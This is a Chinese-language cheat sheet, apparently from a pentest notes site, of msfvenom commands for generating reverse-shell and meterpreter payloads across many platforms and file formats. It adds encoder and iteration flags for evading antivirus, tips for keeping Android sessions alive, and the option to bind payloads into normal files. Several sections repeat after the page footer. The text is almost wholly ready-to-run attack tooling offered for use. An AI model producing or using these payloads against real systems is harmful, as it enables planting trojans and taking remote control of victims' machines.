Msfvenom常用payload

payload又称为攻击载荷，主要是用来建立目标机与攻击机稳定连接的，可返回shell，也可以进行程序注入等。也有人把payloads称为shellcode。

windows

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp
LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe

linux

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f elf -o payload.elf

android

捆绑文件Android需要先:

sudo apt install zipalign

//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk

生成的安卓MainActivity一段时间会失效,需要show advanced，set exit on session 为false 和session communication timeout =0 默认会话是300秒断开

powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1

mac

msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f macho -o payload.macho

php

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

aspx

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f aspx -o payload.aspx

jsp

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.jsp

war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw - o payload.war

python

msfvenom -p python/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.py

nodejs

msfvenom -p nodejs/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.js

perl

msfvenom -p cmd/unix/reverse_perl LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.pl

ruby

msfvenom -p ruby/shell_reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.rb

lua

msfvenom -p cmd/unix/reverse_lua LHOST=攻击机IP LPORT=攻击机端口 -f raw -o payload.lua

windows shellcode

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

linux shellcode

msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f c

show options

-l:列出所有的payload
-p:指定要加载的payload
-f:指定生成的格式输出：
可以生成一句话木马 asp，aspx，php等等
可以支持 py，java，c，bash，python等等
可以支持 exe，dll，elf，vbs，war等等
-e:使用编码器，选择加壳encode
-a:精确编码生成的payload用于32位操作系统，指定-a x86
-s:生成payload的时候可以指定最大多少
-b：去除空代码或者错误代码减少多余的字符同时减少体积
（-b \x00\xff）
-i:指定编码次数（不好用，过不去网页查杀）
-x：捆绑一个正常文件
-o：指定输出位置

PreviousUntitled NextCobaltStrike生成windows木马

Last updated 5 years ago

Was this helpful?

android

捆绑文件Android需要先:

sudo apt install zipalign

//需要签名
msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -f apk -o payload.apk

生成的安卓MainActivity一段时间会失效,需要show advanced，set exit on session 为false 和session communication timeout =0 默认会话是300秒断开

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

show options

-l:列出所有的payload
-p:指定要加载的payload
-f:指定生成的格式输出：
可以生成一句话木马 asp，aspx，php等等
可以支持 py，java，c，bash，python等等
可以支持 exe，dll，elf，vbs，war等等
-e:使用编码器，选择加壳encode
-a:精确编码生成的payload用于32位操作系统，指定-a x86
-s:生成payload的时候可以指定最大多少
-b：去除空代码或者错误代码减少多余的字符同时减少体积
（-b \x00\xff）
-i:指定编码次数（不好用，过不去网页查杀）
-x：捆绑一个正常文件
-o：指定输出位置